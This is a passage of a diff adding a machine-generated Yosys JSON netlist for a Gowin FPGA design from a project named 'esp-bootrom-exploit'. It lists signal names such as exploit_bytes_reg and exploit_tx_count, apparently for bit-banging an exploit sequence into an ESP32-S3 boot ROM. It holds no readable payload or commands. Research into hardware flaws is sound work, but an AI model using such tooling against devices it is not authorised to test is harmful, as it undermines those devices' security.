"c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:21.11-21.22" + } + }, + "bang_tx_reg_DFFE_Q_D": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 25 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 26 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "clk_in": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:4.11-4.17" + } + }, + "clk_in_IBUF_I_O": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + } + }, + "exploit_bytes_reg": { + "hide_name": 0, + "bits": [ 28, 27, 28, 28, 28, 27, 28, 28, 27, 27, 27, 27, 27, 27, 27, 27, 28, 27, 27, 27, 28, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 27, 28, 27, 28, 28, 28, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 27, 28, 28, 28, 28, 28, 27, 27, 27, 27, 27, 27, 27, 27 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:29.27-29.44" + } + }, + "exploit_tx_count": { + "hide_name": 0, + "bits": [ 17, 20, 24, 23, 22, 21, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:28.12-28.28" + } + }, + "exploit_tx_count_DFFE_Q_1_D": { + "hide_name": 0, + "bits": [ 30 ], + "attributes": { + } + }, + "exploit_tx_count_DFFE_Q_1_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 32 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "exploit_tx_count_DFFE_Q_2_D": { + "hide_name": 0, + "bits": [ 33 ], + "attributes": { + } + }, + "exploit_tx_count_DFFE_Q_2_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 31 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "exploit_tx_count_DFFE_Q_3_D": { + "hide_name": 0, + "bits": [ 35 ], + "attributes": { + } + }, + "exploit_tx_count_DFFE_Q_3_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 34 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "exploit_tx_count_DFFE_Q_4_D": { + "hide_name": 0, + "bits": [ 37 ], + "attributes": { + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN": { + "hide_name": 0, + "bits": [ 38 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "unused_bits": "0 " + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 36 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "exploit_tx_count_DFFE_Q_5_D": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + } + }, + "exploit_tx_count_DFFE_Q_D": { + "hide_name": 0, + "bits": [ 29 ], + "attributes": { + } + }, + "exploit_tx_count_DFFE_Q_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 41 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "unused_bits": "0 " + } + }, + "instruction_counter": { + "hide_name": 0, + "bits": [ 91, 89, 86, 83, 76, 73, 70, 67, 64, 61, 58, 55, 52, 48, 114, 111, 108, 105, 102, 99, 96, 81, 46, 44 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:27.12-27.31" + } + }, + "instruction_counter_DFFE_Q_10_D": { + "hide_name": 0, + "bits": [ 47 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_10_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 50 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_11_D": { + "hide_name": 0, + "bits": [ 51 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_11_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 49 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_12_D": { + "hide_name": 0, + "bits": [ 54 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_12_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 53 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_13_D": { + "hide_name": 0, + "bits": [ 57 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_13_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 56 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_14_D": { + "hide_name": 0, + "bits": [ 60 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_14_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 59 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_15_D": { + "hide_name": 0, + "bits": [ 63 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_15_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 62 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_16_D": { + "hide_name": 0, + "bits": [ 66 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_16_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 65 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_17_D": { + "hide_name": 0, + "bits": [ 69 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_17_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 68 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_18_D": { + "hide_name": 0, + "bits": [ 72 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_18_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 71 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_19_D": { + "hide_name": 0, + "bits": [ 75 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_19_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 74 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_1_D": { + "hide_name": 0, + "bits": [ 45 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_1_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 79 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_20_D": { + "hide_name": 0, + "bits": [ 82 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_20_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 77 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_21_D": { + "hide_name": 0, + "bits": [ 85 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_21_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 84 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_22_D": { + "hide_name": 0, + "bits": [ 88 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN": { + "hide_name": 0, + "bits": [ 90 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 92 ], + "attributes": { + "unused_bits": "0 " + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 87 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_23_D": { + "hide_name": 0, + "bits": [ 93 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_2_D": { + "hide_name": 0, + "bits": [ 80 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_2_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 78 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_3_D": { + "hide_name": 0, + "bits": [ 95 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_3_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 94 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_4_D": { + "hide_name": 0, + "bits": [ 98 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_4_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 97 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_5_D": { + "hide_name": 0, + "bits": [ 101 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_5_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 100 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_6_D": { + "hide_name": 0, + "bits": [ 104 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_6_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 103 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_7_D": { + "hide_name": 0, + "bits": [ 107 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_7_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 106 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_8_D": { + "hide_name": 0, + "bits": [ 110 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_8_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 109 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_9_D": { + "hide_name": 0, + "bits": [ 113 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_9_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 112 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "instruction_counter_DFFE_Q_D": { + "hide_name": 0, + "bits": [ 43 ], + "attributes": { + } + }, + "instruction_counter_DFFE_Q_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 115 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "unused_bits": "0 " + } + }, + "led": { + "hide_name": 0, + "bits": [ 5, 6, 7, 8, 9, 10 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:7.18-7.21" + } + }, + "ledCounter": { + "hide_name": 0, + "bits": [ 133, 131, 128, 125, 121, 118 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:26.11-26.21" + } + }, + "ledCounter_DFFRE_Q_1_D": { + "hide_name": 0, + "bits": [ 120 ], + "attributes": { + } + }, + "ledCounter_DFFRE_Q_1_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 123 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "ledCounter_DFFRE_Q_2_D": { + "hide_name": 0, + "bits": [ 124 ], + "attributes": { + } + }, + "ledCounter_DFFRE_Q_2_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 122 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "ledCounter_DFFRE_Q_3_D": { + "hide_name": 0, + "bits": [ 127 ], + "attributes": { + } + }, + "ledCounter_DFFRE_Q_3_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 126 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "ledCounter_DFFRE_Q_4_D": { + "hide_name": 0, + "bits": [ 130 ], + "attributes": { + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN": { + "hide_name": 0, + "bits": [ 132 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 134 ], + "attributes": { + "unused_bits": "0 " + } + }, + "ledCounter_DFFRE_Q_4_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 129 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "ledCounter_DFFRE_Q_5_D": { + "hide_name": 0, + "bits": [ 135 ], + "attributes": { + } + }, + "ledCounter_DFFRE_Q_D": { + "hide_name": 0, + "bits": [ 117 ], + "attributes": { + } + }, + "ledCounter_DFFRE_Q_D_ALU_SUM_COUT": { + "hide_name": 0, + "bits": [ 136 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "unused_bits": "0 " + } + }, + "led_run": { + "hide_name": 